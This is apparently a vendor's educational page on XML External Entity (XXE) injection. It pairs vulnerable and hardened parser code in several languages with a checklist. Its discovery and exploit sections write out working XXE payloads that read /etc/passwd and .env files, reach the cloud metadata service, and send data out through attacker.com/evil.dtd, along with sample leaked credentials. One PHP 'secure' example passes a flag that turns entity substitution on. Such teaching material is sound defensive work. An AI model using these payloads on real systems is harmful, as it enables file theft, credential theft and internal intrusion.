XML External Entity (XXE)

External Entity Injection

XML External Entity (XXE) at a glance

What it is: An XML parser loads and expands external entities from files or network resources, letting attackers read local files or pivot SSRF during parsing.

Why it happens: XXE vulnerabilities occur when applications process untrusted XML with default or unsafe parser settings, allowing external entity resolution in uploads, integrations, or document handling.

How to fix: Disable DTDs and external entities for untrusted XML, block parser network access with safe resolvers, and prefer simpler formats like JSON when possible.

Overview

XXE happens when XML parsers expand entities defined in a DTD that point at external resources. Attackers embed SYSTEM or PUBLIC entities that reference files like /etc/passwd or internal HTTP endpoints. When the parser expands the entity, sensitive data can be disclosed or internal services contacted. The fix is to disable DTDs and external entity resolution and to run parsers with network access disabled.

sequenceDiagram participant Browser participant App as App Server participant XML as XML Parser Browser->>App: POST /upload-xml with SYSTEM entity App->>XML: Parse untrusted XML XML-->>App: Replaces &xxe; with file contents App-->>Browser: Sensitive data returned note over App,XML: Disable DTDs and entity expansion

A potential flow for a XML External Entity (XXE) exploit

Where it occurs

It occurs in file upload, XML processing, or integration endpoints like SOAP, SAML, or XML-to-JSON converters that use insecure parser settings or enable external entity resolution.

Impact

File disclosure, credential and key leakage, request forgery to internal hosts, and in rare cases code execution if the parser supports dangerous protocols.

Prevention

Prevent XXE by rejecting XML when possible or using safe streaming parsers with DTDs and external entities disabled, empty resolvers, no network access, and strict time and size limits.

Examples

Switch tabs to view language/framework variants.

DOM parser resolves external entities and allows file exfiltration

Default parser loads external entities from file or network.

Vulnerable

Java • JAXP DOMParser — Bad

DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
// BUG: no hardening, external entities and DTD allowed by default on some impls
DocumentBuilder b = f.newDocumentBuilder();
Document doc = b.parse(req.getInputStream());

Line 2: No features disabled, DTD and external entities may resolve

External entity references let attackers read files or make server side requests during parsing.

Secure

Java • JAXP DOMParser — Good

DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
f.setFeature("http://xml.org/sax/features/external-general-entities", false);
f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
f.setXIncludeAware(false);
f.setExpandEntityReferences(false);
DocumentBuilder b = f.newDocumentBuilder();
// Optionally use a secure resolver that rejects all external entities
b.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
Document doc = b.parse(req.getInputStream());

Line 2: Disable DTD and both external entity features, set a rejecting EntityResolver

Disable DTDs and entity expansion entirely for untrusted XML.

XmlDocument with default resolver processes external entities

Leaving XmlResolver set allows file and network access during parse.

Vulnerable

C# • ASP.NET Core — Bad

var doc = new XmlDocument();
// BUG: default resolver enabled on some targets
using var s = req.Body;
doc.Load(s);

Line 2: No explicit resolver nulling or DTD prohibition

External entities can read files or send network requests during XML parse.

Secure

C# • ASP.NET Core — Good

var doc = new XmlDocument { XmlResolver = null }; // block external resolves
doc.Load(reader: XmlReader.Create(req.Body, new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver = null
}));

Line 1: Disable DTD and resolvers via XmlReaderSettings and XmlDocument

Prohibit DTD processing and set XmlResolver to null.

lxml.etree parses external entities unless disabled

Unsafe parser can read files or perform SSRF through external entities.

Vulnerable

Python • Flask + lxml — Bad

from lxml import etree
@app.post('/convert')
def convert():
    xml = request.data
    root = etree.fromstring(xml)  # BUG: no resolver or DTD disallow
    return etree.tostring(root)

Line 5: Default parser may resolve entities and allow network access

Entity expansion leaks local files and reaches internal services.

Secure

Python • Flask + lxml — Good

from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
@app.post('/convert')
def convert():
    root = etree.fromstring(request.data, parser=parser)
    return etree.tostring(root)

Line 2: Disable entity resolution and network access explicitly

Turn off entity resolution and DTDs, and block network access in the parser.

DOMDocument with external entity loading leaks files

Default options may allow network or file access during parse.

Vulnerable

PHP • DOMDocument — Bad

<?php
$dom = new DOMDocument();
// BUG: DTD and external entity load allowed
$dom->loadXML($input);
echo $dom->textContent;

Line 4: Parses user XML without disabling external entities

External entities can pull local files or remote resources into the parse result.

Secure

PHP • DOMDocument — Good

<?php
$dom = new DOMDocument();
$prev = libxml_disable_entity_loader(true);
$dom->resolveExternals = false;
$dom->substituteEntities = false;
$dom->loadXML($input, LIBXML_NONET | LIBXML_NOENT | LIBXML_DTDLOAD ^ LIBXML_DTDLOAD);
libxml_disable_entity_loader($prev);
echo htmlspecialchars($dom->textContent, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

Line 6: Disable entity loader, forbid network access, and avoid DTD processing

Disable entity loading and DTDs, and prevent network access during parsing.

Nokogiri parses external entities unless turned off

If network loading is enabled, entities can reach file or HTTP.

Vulnerable

Ruby • Nokogiri — Bad

class FeedsController < ApplicationController
  def create
    xml = params[:xml]
    doc = Nokogiri::XML(xml) # BUG: no nonet or noent restrictions
    render plain: doc.text
  end
end

Line 5: Parses XML without restricting network access

External entity expansion can read local files or cause SSRF.

Secure

Ruby • Nokogiri — Good

doc = Nokogiri::XML(params[:xml]) do |config|
  config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
end
render plain: doc.text

Line 1: Use NONET and strict parsing to block network and DTD fetches

Disable network access and DTDs for untrusted XML.

libxmljs parses external entities when not configured safely

Bindings to libxml2 can expand external entities by default.

Vulnerable

JavaScript • libxmljs — Bad

const libxml = require('libxmljs');
app.post('/xml2json', (req,res)=>{
  const xml = req.body.toString();
  const doc = libxml.parseXml(xml); // BUG: no hardening
  res.send(doc.root().text());
});

Line 4: Parsing without disabling DTD and external entity features

External entities can read files and fetch URLs during parse.

Secure

JavaScript • libxmljs — Good

const parseOpts = { noent: false, dtdload: false, dtdattr: false, noerror: true, nowarning: true, nonet: true };
const doc = libxml.parseXml(xml, parseOpts);
res.send(doc.root().text());

Line 1: Disables DTD loading and network access, keeps entity expansion off

Use parser flags to disable DTDs, entity expansion, and network.

Engineer Checklist

Disallow doctype declarations in untrusted XML
Disable external entity resolution and set a safe resolver
Disable parser network access and set time and size limits
Prefer JSON or simple formats for untrusted data paths
Add tests that submit external entity payloads and expect rejection

End-to-End Example

An upload endpoint parses invoices from XML using default parser settings. An attacker submits a document with a SYSTEM entity that reads a local file, which is then included in the parsed output.

Vulnerable

JAVA

// Java/Spring Boot - Vulnerable to XXE

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;

@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
    // VULNERABLE: Using default DocumentBuilderFactory settings
    // Does NOT disable external entities or DTDs
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    
    // DANGEROUS: These security features are NOT set!
    // factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    // factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    
    DocumentBuilder builder = factory.newDocumentBuilder();
    
    // VULNERABLE: Parses untrusted XML with external entities enabled
    // Attacker sends:
    // <?xml version="1.0"?>
    // <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    // <invoice><id>&xxe;</id></invoice>
    Document doc = builder.parse(xmlInput);
    
    // Extract and return data (includes expanded external entities!)
    NodeList nodes = doc.getElementsByTagName("id");
    String invoiceId = nodes.item(0).getTextContent();
    
    return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
}

// Python/Flask + lxml - Also vulnerable
from flask import Flask, request
from lxml import etree

@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
    xml_data = request.data
    
    # VULNERABLE: Default lxml parser allows external entities
    # Attacker sends:
    # <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    # <root><data>&xxe;</data></root>
    parser = etree.XMLParser()  # No resolve_entities=False!
    tree = etree.fromstring(xml_data, parser)
    
    result = tree.find('.//data').text
    return {'data': result}

Secure

JAVA

// Java/Spring Boot - SECURE against XXE

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    
    // SECURE: Disable DTDs completely
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    
    // SECURE: Disable external entities
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    
    // SECURE: Disable external DTDs
    factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    
    // SECURE: Disable XInclude processing
    factory.setXIncludeAware(false);
    
    // SECURE: Disable entity expansion
    factory.setExpandEntityReferences(false);
    
    DocumentBuilder builder = factory.newDocumentBuilder();
    
    // Set entity resolver that returns empty content
    builder.setEntityResolver((publicId, systemId) -> {
        // Return empty input source for any external entity
        return new InputSource(new java.io.StringReader(""));
    });
    
    try {
        Document doc = builder.parse(xmlInput);
        
        NodeList nodes = doc.getElementsByTagName("id");
        String invoiceId = nodes.item(0).getTextContent();
        
        return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
    } catch (SAXException e) {
        // Will throw exception if DOCTYPE is found
        return ResponseEntity.badRequest()
            .body(Map.of("error", "Invalid XML: DOCTYPE not allowed"));
    }
}

// Python/Flask + lxml - SECURE
from flask import Flask, request
from lxml import etree

@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
    xml_data = request.data
    
    # SECURE: Disable entity resolution
    parser = etree.XMLParser(
        resolve_entities=False,  # Don't resolve external entities
        no_network=True,         # Disable network access
        dtd_validation=False,    # Don't validate DTDs
        load_dtd=False          # Don't load DTDs
    )
    
    try:
        tree = etree.fromstring(xml_data, parser)
        
        # Only parse if no DOCTYPE found
        if tree.getroottree().docinfo.doctype:
            return {'error': 'DOCTYPE not allowed'}, 400
        
        result = tree.find('.//data').text
        return {'data': result}
    except etree.XMLSyntaxError as e:
        return {'error': 'Invalid XML'}, 400

# ALTERNATIVE: Use JSON instead of XML when possible
@app.route('/api/upload-invoice', methods=['POST'])
def upload_invoice():
    # SECURE: Use JSON instead of XML to avoid XXE entirely
    data = request.get_json()
    invoice_id = data.get('id')
    return {'invoiceId': invoice_id}

Discovery

This vulnerability is discovered by submitting XML input containing external entity declarations and observing that the application processes them, either returning the entity content or exhibiting timing differences that confirm external resource access.

1. Test basic external entity
http
Action

Submit XML with simple SYSTEM entity to test if external entities are processed
Request
POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\"> ]>\n<invoice><id>&xxe;</id></invoice>"
Response
Status: 200

Body:

{ "invoice_id": "prod-server-01\n", "message": "Invoice processed", "note": "Server hostname from /etc/hostname appears in response - XXE confirmed" }
Artifacts

xxe_confirmed entity_processing_enabled file_disclosure

2. Probe for sensitive file disclosure

http

Action

Test file:// protocol access to read /etc/passwd

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n<data><content>&xxe;</content></data>"

Response

Status: 200

Body:

{
  "content": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\napp-user:x:1000:1000::/home/app-user:/bin/bash\npostgres:x:999:999:PostgreSQL Server:/var/lib/postgresql:/bin/bash",
  "note": "Complete /etc/passwd file disclosed via XXE"
}

Artifacts

passwd_file_disclosed system_users_enumerated file_access_confirmed

3. Test outbound HTTP via SSRF

http

Action

Verify parser can make HTTP requests to external/internal hosts

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://attacker.com/xxe-callback\"> ]>\n<data><test>&xxe;</test></data>"

Response

Status: 200

Body:

{
  "message": "Processed",
  "note": "Attacker server logs show: [2024-01-15 10:23:45] GET /xxe-callback HTTP/1.1 from 52.143.12.89 (prod-server.example.com)"
}

Artifacts

ssrf_confirmed outbound_http_allowed xxe_ssrf_vector

4. Test parameter entity for blind XXE

http

Action

Use parameter entities to exfiltrate data via external DTD

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [\n<!ENTITY % file SYSTEM \"file:///app/.env\">\n<!ENTITY % dtd SYSTEM \"http://attacker.com/evil.dtd\">\n%dtd;\n]>\n<data>&send;</data>"

Response

Status: 200

Body:

{
  "message": "Processed",
  "note": "Attacker server receives: GET /exfil?data=DATABASE_URL%3Dpostgresql%3A%2F%2Fadmin%3APr0dP%40ss..."
}

Artifacts

blind_xxe_confirmed data_exfiltration parameter_entity_processing

Exploit steps

An attacker exploits this by crafting XML payloads with external entity declarations that reference local files (file:///etc/passwd) or internal network resources, exfiltrating sensitive data or using the parser as an SSRF vector.

1. Extract application secrets

Read .env file containing database credentials and API keys

http

Action

Use XXE to access application configuration files

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"file:///app/.env\"> ]>\n<invoice><notes>&xxe;</notes></invoice>"

Response

Status: 200

Body:

{
  "invoice_notes": "DATABASE_URL=postgresql://admin:Pr0dP@ssw0rd2024@db.internal.example.com:5432/production\nAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nSTRIPE_SECRET_KEY=sk_live_51HxYz3FGHxYz3FGHxYz3FG\nJWT_SECRET=super-secret-jwt-key-do-not-share\nREDIS_URL=redis://cache.internal.example.com:6379/0",
  "note": "Complete application secrets exposed via XXE file disclosure"
}

Artifacts

database_credentials aws_credentials stripe_api_key jwt_secret redis_connection

2. Access cloud metadata service via SSRF

Exploit XXE to query AWS EC2 metadata for IAM credentials

http

Action

Use XXE as SSRF vector to access cloud provider metadata

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role\"> ]>\n<data><creds>&xxe;</creds></data>"

Response

Status: 200

Body:

{
  "creds": "{\n  \"Code\": \"Success\",\n  \"LastUpdated\": \"2024-01-15T10:23:45Z\",\n  \"Type\": \"AWS-HMAC\",\n  \"AccessKeyId\": \"ASIATESTACCESSKEY123\",\n  \"SecretAccessKey\": \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",\n  \"Token\": \"IQoJb3JpZ2luX2VjEHoaCXVzLWVhc3QtMSJIMEYCIQD...\",\n  \"Expiration\": \"2024-01-15T16:23:45Z\"\n}",
  "note": "IAM role credentials with S3, RDS, and EC2 permissions exposed"
}

Artifacts

iam_credentials aws_metadata_access cloud_service_compromise temporary_credentials

3. Exfiltrate via blind XXE

Use out-of-band XXE to exfiltrate sensitive files

http

Action

Leverage parameter entities to send file contents to attacker server

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [\n<!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=/app/config/database.yml\">\n<!ENTITY % dtd SYSTEM \"http://attacker.com/evil.dtd\">\n%dtd;\n%send;\n]>\n<data></data>"

Response

Status: 200

Body:

{
  "message": "Processed",
  "attacker_log": "GET /exfil?f=cHJvZHVjdGlvbjoKICBhZGFwdGVyOiBwb3N0Z3Jlc3FsCiAgaG9zdDogZGIuaW50ZXJuYWwuZXhhbXBsZS5jb20...",
  "decoded": "production:\\n  adapter: postgresql\\n  host: db.internal.example.com\\n  database: production\\n  username: admin\\n  password: Pr0dP@ssw0rd2024",
  "note": "Database configuration exfiltrated via blind XXE to attacker server"
}

Artifacts

blind_xxe_exfiltration database_config_leaked base64_encoded_data out_of_band_channel

4. Enumerate internal network services

Use XXE SSRF to scan internal network and identify services

http

Action

Probe internal IP ranges to map network topology

Request

POST https://api.example.com/api/upload-xml

Headers:

Content-Type: application/xml

Body:

"<?xml version=\"1.0\"?>\n<!DOCTYPE data [ <!ENTITY xxe SYSTEM \"http://10.0.0.5:6379/\"> ]>\n<data><service>&xxe;</service></data>"

Response

Status: 200

Body:

{
  "service": "-ERR wrong number of arguments for 'get' command\\r\\n",
  "note": "Redis server response at 10.0.0.5:6379 - internal service discovered",
  "additional_findings": {
    "10.0.0.3:5432": "PostgreSQL database server",
    "10.0.0.8:9200": "Elasticsearch cluster",
    "10.0.0.12:27017": "MongoDB instance",
    "10.0.1.50:8080": "Internal admin panel"
  }
}

Artifacts

internal_network_map service_discovery redis_server_found attack_surface_expanded

Specific Impact

Sensitive files and service metadata are exposed, which can include credentials or configuration needed to pivot deeper into the environment.

Attackers may chain this with SSRF to query internal HTTP based services, leading to data theft or remote operations.

Fix

Harden the XML parser by prohibiting doctype declarations and turning off external entity resolution. Provide a resolver that returns empty input and, where possible, disable parser network access. Prefer simpler formats such as JSON for untrusted data.

Detect This Vulnerability in Your Code

Sourcery automatically identifies xml external entity (xxe) vulnerabilities and many other security issues in your codebase.

Scan Your Code for Free